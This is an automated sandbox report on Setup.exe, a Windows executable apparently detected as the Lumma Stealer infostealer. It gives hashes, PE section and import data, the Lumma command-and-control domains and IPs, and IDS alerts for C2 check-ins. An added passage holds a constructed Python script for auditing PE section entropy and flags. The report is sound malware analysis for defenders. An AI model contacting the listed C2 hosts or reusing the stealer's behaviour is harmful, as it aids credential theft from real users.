                                                                    https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F765611997BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://store.steampowered.com/stats/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://medal.tvBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://resinedyw.sbs/BitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://allocatinow.sbs/piBitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=eBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xT%BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/imBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.114.97.3
                                                                                        drawwyobstacw.sbsEuropean Union
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        104.21.33.249
                                                                                        enlargkiw.sbsUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        172.67.173.224
                                                                                        ehticsprocw.sbsUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        188.114.96.3
                                                                                        mathcucom.sbsEuropean Union
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        104.102.49.254
                                                                                        steamcommunity.comUnited States
                                                                                        16625AKAMAI-ASUStrue
                                                                                        172.67.140.193
                                                                                        vennurviot.sbsUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        104.21.77.78
                                                                                        resinedyw.sbsUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        104.21.79.35
                                                                                        condifendteu.sbsUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        172.67.206.204
                                                                                        sergei-esenin.comUnited States
                                                                                        13335CLOUDFLARENETUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532481
Start date and time: 2024-10-13 11:59:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/0@11/9
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 15
• Number of non-executed functions: 113
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 6752 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type               Description
06:00:27  API Interceptor    5x Sleep call for process: BitLockerToGo.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match (domain) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match (ASN) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match (JA3 fingerprint) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.416777592795084
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Setup.exe
File size:19'250'176 bytes
MD5:f1113fd6005b558b0a9624edd97dbd58
SHA1:6a0b156e56f99d81e4567d5b4e0d296957f38746
SHA256:faaf64f9c081fdcf8715679549607bba7f70b594459167cf9f5a9b73664d89ba
SHA512:f229362283073eab59a0b6c8f9173920abb6516e36c9414a89572f5492c73563d52f571790500af8a67a8ba9748ac29fe112a10910f6e3c77b27e09cfaf565a9
SSDEEP:98304:a/AdF5wjB2FFANtTT7q/fxZjhorJdmTnAZPwcdQXadAwrtyEdrup6KCKtr454cbP:3FWqsTQftoG0ZPwZXqdJhQrIbp7FL
TLSH:B1173941FACBD4F5E9034830459BB22F63345D058B28CACBEB447A7AF8372D29DB6255
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........%......................... .............@...........................).....Uh&...@................................
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x47aa20
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:1
File Version Major:6
File Version Minor:1
Subsystem Version Major:6
Subsystem Version Minor:1
Import Hash:1aae8bf580c846f39c71c05898e57e88
Instruction
jmp 00007F114912D210h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F1149107B66h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F114912F674h
cld
call 00007F114912E6FEh
call 00007F114912D339h
add esp, 08h
ret
jmp 00007F114912F520h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F114912F521h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1220000 | 0x44c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1296000 | 0x1f54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1221000 | 0x730ec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11434c0 | 0xb4 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8aeee8 | 0x8af000 | 05c2e7956f35d34727636aa107313adf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8b0000 | 0x8908a4 | 0x890a00 | 1857d9b6a2a3970db7b60edf4f86520d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x1141000 | 0xded0c | 0xa6400 | 3f9b5464b358ed1fc0ab46eef38db575 | False | 0.4051779840225564 | data | 6.123134897417408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x1220000 | 0x44c | 0x600 | 6ebd05be7ca24a5e9c9fb34934b91e22 | False | 0.3600260416666667 | OpenPGP Public Key | 3.9465439874144463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x1221000 | 0x730ec | 0x73200 | cced2f04c20a6dbbb87a66193555e3aa | False | 0.5499457111834962 | data | 6.635327694181241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .symtab | 0x1295000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1296000 | 0x1f54 | 0x2000 | c2d76dd7b5c9020e3df76652a00f383f | False | 0.3314208984375 | data | 4.6761607891525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
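The section table above is what a triager reads first: the flag sets in the Characteristics column, the entropy of each section's raw bytes, and names outside the usual MSVC set (the `.symtab` entry here is presumably what the report's "sections with non-standard names" signature refers to). Note that the report lists the entropy of the two largest sections, `.text` and `.rdata`, as "unknown", so you may want to recompute it yourself. The following is an added example, not Joe Sandbox code and not taken from the sample: it parses raw `IMAGE_SECTION_HEADER` entries, decodes the flag bits into the same names the report prints, computes Shannon entropy over each section's raw data, and flags writable-and-executable sections, unusual names, and high-entropy code. The image it runs on is constructed (it begins directly at the section table and its contents are synthetic, chosen to trip each check); the `.xored PE`, `ZLIB Complexity` and `File Type` columns of the report are not reproduced.

```python
"""Parse a PE section table and reproduce the per-section checks the report
shows (characteristics flags, entropy), flagging what a triager cares about.

The image below is constructed: it starts directly at the section table
(a real file has DOS/NT headers first and the caller passes the table offset)
and the section contents are synthetic, chosen to exercise each check.
"""
import math
import struct
from collections import Counter

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes

FLAGS = [  # (bit, name) in ascending bit order, the order the report prints them
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x00000080, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"),
    (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]
MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000
# Names an MSVC-linked PE normally carries; anything else is worth a look.
COMMON_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                ".reloc", ".rsrc", ".bss", ".tls", ".CRT"}


def flag_names(characteristics: int) -> list[str]:
    return [name for bit, name in FLAGS if characteristics & bit]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_section_table(image: bytes, offset: int, count: int) -> list[dict]:
    sections = []
    for i in range(count):
        raw_name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = \
            SECTION_HDR.unpack_from(image, offset + i * SECTION_HDR.size)
        sections.append({
            "name": raw_name.split(b"\0", 1)[0].decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": chars,
        })
    return sections


def audit_sections(sections: list[dict], image: bytes) -> list[tuple[str, str]]:
    """Annotate each section dict with its entropy and return (name, finding) pairs."""
    findings = []
    for s in sections:
        ch, name = s["characteristics"], s["name"]
        data = image[s["raw_ptr"]: s["raw_ptr"] + s["raw_size"]]
        s["entropy"] = shannon_entropy(data)
        if ch & MEM_WRITE and ch & MEM_EXECUTE:
            findings.append((name, "writable and executable"))
        if name not in COMMON_NAMES:
            findings.append((name, "non-standard section name"))
        if ch & MEM_EXECUTE and s["entropy"] > 7.0:
            findings.append((name, "high-entropy executable data (packed or encrypted code?)"))
        if s["raw_size"] and len(data) < s["raw_size"]:
            findings.append((name, "raw data extends past end of file"))
    return findings


def build_sample_image() -> bytes:
    """Constructed 4-section image; contents chosen to trip each check."""
    layout = [  # name, characteristics, raw_ptr, raw bytes
        (b".text",   0x60000020, 0x200, bytes(range(256)) * 2),  # R+X, uniform bytes
        (b".data",   0xC0000040, 0x400, b"\0" * 0x200),          # R+W, zero-filled
        (b".symtab", 0x42000000, 0x600, b"\0" * 4),              # name outside the usual set
        (b".blob",   0xE0000020, 0x800, b"\x90" * 0x100),        # R+W+X: always suspicious
    ]
    image = bytearray(0x900)
    for i, (name, chars, ptr, data) in enumerate(layout):
        SECTION_HDR.pack_into(image, i * SECTION_HDR.size, name, len(data),
                              0x1000 * (i + 1), len(data), ptr, 0, 0, 0, 0, chars)
        image[ptr:ptr + len(data)] = data
    return bytes(image)


SAMPLE_IMAGE = build_sample_image()

if __name__ == "__main__":
    secs = parse_section_table(SAMPLE_IMAGE, 0, 4)
    for finding in audit_sections(secs, SAMPLE_IMAGE):
        print(*finding, sep=": ")
    for s in secs:
        print(s["name"], f"{s['entropy']:.3f}", ", ".join(flag_names(s["characteristics"])))
```

On a real file, locate the section table via the `e_lfanew` field of the DOS header plus the size of the NT headers, and take the section count from `FileHeader.NumberOfSections`; the entropy threshold of 7.0 is a rule of thumb, not a hard boundary, since large compiled code sections like this sample's 9 MB `.text` typically land well below it while packed payloads sit near 8.0.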
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x12961d4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675 |
| RT_ICON | 0x12962fc | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179 |
| RT_ICON | 0x1296864 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548 |
| RT_ICON | 0x1296b4c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516 |
| RT_GROUP_ICON | 0x12973f4 | 0x3e | data | English | United States | 0.8387096774193549 |
| RT_VERSION | 0x1297434 | 0x4f4 | data | English | United States | 0.27208201892744477 |
| RT_MANIFEST | 0x1297928 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924 |
| DLL | Import |
|---|---|
| kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-13T12:00:28.046409+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP |
| 2024-10-13T12:00:28.046409+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP |
| 2024-10-13T12:00:28.058427+0200 | 2056570 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) | 1 | 192.168.2.4 | 55215 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:28.579610+0200 | 2056571 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) | 1 | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP |
| 2024-10-13T12:00:29.015426+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP |
| 2024-10-13T12:00:29.015426+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP |
| 2024-10-13T12:00:29.017335+0200 | 2056568 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) | 1 | 192.168.2.4 | 58064 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:29.044146+0200 | 2056566 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) | 1 | 192.168.2.4 | 58164 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:29.570044+0200 | 2056567 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) | 1 | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP |
| 2024-10-13T12:00:30.024392+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP |
| 2024-10-13T12:00:30.024392+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP |
| 2024-10-13T12:00:30.077573+0200 | 2056564 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) | 1 | 192.168.2.4 | 49501 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:30.581850+0200 | 2056565 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) | 1 | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP |
| 2024-10-13T12:00:30.979674+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP |
| 2024-10-13T12:00:30.979674+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP |
| 2024-10-13T12:00:30.993990+0200 | 2056562 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) | 1 | 192.168.2.4 | 58845 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:31.511896+0200 | 2056563 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) | 1 | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP |
| 2024-10-13T12:00:31.974411+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP |
| 2024-10-13T12:00:31.974411+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP |
| 2024-10-13T12:00:31.976753+0200 | 2056560 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) | 1 | 192.168.2.4 | 49709 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:32.501560+0200 | 2056561 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) | 1 | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP |
| 2024-10-13T12:00:32.962498+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP |
| 2024-10-13T12:00:32.962498+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP |
| 2024-10-13T12:00:32.981280+0200 | 2056558 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) | 1 | 192.168.2.4 | 57956 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:33.483066+0200 | 2056559 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) | 1 | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP |
| 2024-10-13T12:00:33.944460+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP |
| 2024-10-13T12:00:33.944460+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP |
| 2024-10-13T12:00:33.952216+0200 | 2056556 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) | 1 | 192.168.2.4 | 51189 | 1.1.1.1 | 53 | UDP |
| 2024-10-13T12:00:34.145782+0200 | 2056557 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) | 1 | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP |
| 2024-10-13T12:00:35.413053+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49744 | 104.102.49.254 | 443 | TCP |
| 2024-10-13T12:00:36.251128+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49745 | 172.67.206.204 | 443 | TCP |
